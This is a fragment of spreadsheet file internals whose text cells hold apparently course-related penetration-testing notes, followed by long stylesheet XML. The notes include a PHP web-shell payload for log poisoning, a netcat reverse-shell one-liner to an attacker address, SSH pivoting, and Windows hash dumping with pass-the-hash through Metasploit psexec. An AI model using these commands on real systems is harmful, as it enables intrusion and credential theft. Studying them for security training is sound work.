2. Capture the request in burpsuite and send to repeater
3. In the UAS add the payload/ cmd php shell
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>&lt;?php system($_GET['cmd']) ?&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
      </rPr>
      <t xml:space="preserve">
4. Add the 'cmd' parameter to the url i.e.
&lt;url&gt;/file.php?=/var/log/apache2/access.log&amp;cmd=&lt;command&gt;
5. Get a reverse shell to your machine
We can use a normal nc -e /bin/sh shell but it may not work, try the below:
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc &lt;ip&gt; 1234 &gt;/tmp/f
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">ENSURE that we URL encode the above script in Burpsuite encoder tab.
6. Paste the encoded script after the cmd= in the repeater and hit go. 
7. Ensure our listener is up on attk station. nc -nvlp 1234 
**Might have to stop the proxy/ intercepter and reload the Intruder request. </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">https://tools.kali.org/information-gathering/dotdotpwn
we can use dot dot pwn to automate this lel
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Interesting files to checkout (below):</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <color theme="10"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
https://gracefulsecurity.com/path-traversal-cheat-sheet-windows/</t>
    </r>
  </si>
  <si>
    <t>Linux Priv Esc</t>
  </si>
  <si>
    <t xml:space="preserve">proxychains ssh -L &lt;localhostport (our proxychains port)&gt;:&lt;targetIP/Host&gt;:&lt;targetport&gt; &lt;user&gt;@&lt;targetIP&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">We can use proxychains to route an ssh connection to an unreachable host. </t>
  </si>
  <si>
    <t xml:space="preserve">Port forward SSH connection. i.e. Run a ssh connection through a random port.
USE THIS WHEN METASPLOIT PIVOT MESSES UP CONSTANTLY -&gt; PROVIDES A BETTER MORE STABLE CONNECTION
Use this to run services like nmap to an unreachable host, </t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Once we have compromised a windows box, we can dump the password hashes on the machine. 
IF SMB is enabled on other machines in the network, can can gain access thru using the psexec module in metasploit to attempt the hashed credentials in an effort to gain access. 
Refer to 6.2.2.1.1 in PTP notes. 
https://community.elearnsecurity.com/topic/8987-exploting-via-pivoting-video-second-scenario/?tab=comments#comment-39261
Hashes are stored in LM or NT hash format. 
If we do not have meterpreter, hashes are stored in:
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">C:\Windows\System32\config
or
HKEY_LOCAL_MACHINE\SAM
(Both require system privs and is not accessible while the OS is running...)
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">Use </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">pwdump </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>to dump hashes when the system is running locally or just use hashdump via meterpreter remotely. (PTP 5.9.5 Module 1)</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1. METERPRETER SESSION
&gt;run hashdump
Copy all hashes to file
2. Metasploit
use auxiliary/scanner/smb/psexec_scanner
Input the SMBUser and SMBPass (will be a hash, use everything between 2nd colon and 3rd last. 
Set RHOSTS as a network range to find and try to exploit hosts in the network
Make sure to set the payload windows/meterpreter/reverse_tcp
3. Run and new sessions will be created. 
Or use  </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>exploit/windows/smb/psexec</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve"> (must use the admin hash credentials for this exploit to work)
IF you do not have both LM and NT hashes, you can just set the missing one to 32 zeroes. i.e
0000000000000000000000000000:236SGFSDG346SGSDAGSDFG4</t>
    </r>
  </si>
  <si>
    <t>Ensure the hash format is below:
&lt;username&gt;:&lt;hash&gt; and save as a txt file</t>
  </si>
  <si>
    <t>Could also use rainbow tables. PTP module 1 5.9.7</t>
  </si>
  <si>
    <t xml:space="preserve">Download python heartbleed script from github.
Reveals server information. Set -n to 20+ to gather more information.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</si>
</sst>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3" x14ac:knownFonts="1">
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color theme="10"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="0"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF9C5700"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Consolas"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Consolas"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color theme="0"/>
      <name val="Consolas"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <name val="Consolas"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color rgb="FFFFFFFF"/>
      <name val="Consolas"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="12"/>
      <color theme="1"/>
      <name val="Consolas"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="12"/>
      <color rgb="FF000000"/>
      <name val="Consolas"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color rgb="FF000000"/>
      <name val="Consolas"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="8"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="Consolas"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color theme="1"/>
      <name val="Consolas"/>
      <family val="3"/>
    </font>
    <font>
      <i/>
      <sz val="12"/>
      <color theme="1"/>
      <name val="Consolas"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Bahnschrift"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="24"/>
      <color theme="5"/>
      <name val="Bahnschrift"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="0"/>
      <name val="Bahnschrift"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="14"/>
      <color theme="1"/>
      <name val="Bahnschrift"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="12"/>
      <color theme="0"/>
      <name val="Bahnschrift"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="8"/>
      <color theme="5"/>
      <name val="Bahnschrift"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="8"/>
      <color theme="1"/>
      <name val="Bahnschrift"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="24"/>
      <color rgb="FF0D78B9"/>
      <name val="Bahnschrift"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF0D78B9"/>
      <name val="Bahnschrift"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="8"/>
      <color rgb="FF0D78B9"/>
      <name val="Bahnschrift"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="8"/>
      <color theme="5" tint="0.39997558519241921"/>
      <name val="Bahnschrift"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FFF4B084"/>
      <name val="Bahnschrift"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF0D78B9"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FFFA7D00"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="12"/>
      <color theme="1"/>
      <name val="Consolas"/>
    </font>
    <font>
      <sz val="12"/>
      <color rgb="FF000000"/>
      <name val="Consolas"/>
    </font>
    <font>
      <sz val="12"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="10"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <u/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <i/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <i/>
      <u/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
  </fonts>
  <fills count="28">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF002060"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF92D050"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="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EB9C"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="4"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="5" tint="0.59999389629810485"/>
        <bgColor indexed="65"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="8" tint="0.59999389629810485"/>
        <bgColor indexed="65"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFF2CC"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="4" tint="-0.49998474074526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rgb="FFD6D1BC"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFDDF6FF"/>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3" tint="-0.499984740745262"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFEFF6"/>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rgb="FFFFFF00"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="2"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="4" tint="0.59999389629810485"/>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right/>
      <top/>
      <bottom style="thick">
        <color indexed="64"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top style="thick">
        <color indexed="64"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thick">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right style="thin">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thin">
        <color rgb="FF000000"/>
      </left>
      <right/>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color indexed="64"/>
      </left>
      <right style="thin">
        <color indexed="64"/>
      </right>
      <top/>
      <bottom style="medium">
        <color indexed="64"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top/>
      <bottom style="thin">
        <color indexed="64"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top/>
      <bottom style="thin">
        <color rgb="FF000000"/>
      </bottom>
      <diagonal/>
    </border>
  </borders>
  <cellStyleXfs count="7">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="4" fillId="7" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="2"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1" fillId="24" borderId="45" applyNumberFormat="0" applyAlignment="0" applyProtection="0"/>
  </cellStyleXfs>
  <cellXfs count="271">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="4" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="4" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="3" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1"/>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="4" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="9" borderId="0" xfId="4" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="3" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="4" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="4" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="8" borderId="0" xfId="3" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="7" borderId="0" xfId="2" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="10" borderId="0" xfId="5" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="7" fillId="12" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="13" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="13" borderId="4" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="8" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="9" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="10" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="13" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="6" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="6" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="6" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="6" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="6" borderId="7" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="6" borderId="11" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="12" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="5" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="5" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="5" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="5" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="5" borderId="18" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="5" borderId="19" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="13" borderId="20" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="13" borderId="21" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="14" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="14" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="14" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="14" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="14" borderId="7" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="14" borderId="11" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="15" borderId="23" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="15" borderId="23" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="15" borderId="22" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="10" fillId="13" borderId="18" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="13" borderId="19" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="6" borderId="20" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="6" borderId="21" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="15" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="15" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="15" borderId="7" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="15" borderId="11" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="15" borderId="27" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="15" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="6" borderId="18" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="5" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="5" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="5" borderId="19" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="14" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="14" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="14" borderId="11" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="13" borderId="21" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="13" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="6" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="6" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="6" borderId="19" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="6" borderId="11" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="15" borderId="22" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="17" borderId="4" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="17" borderId="20" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
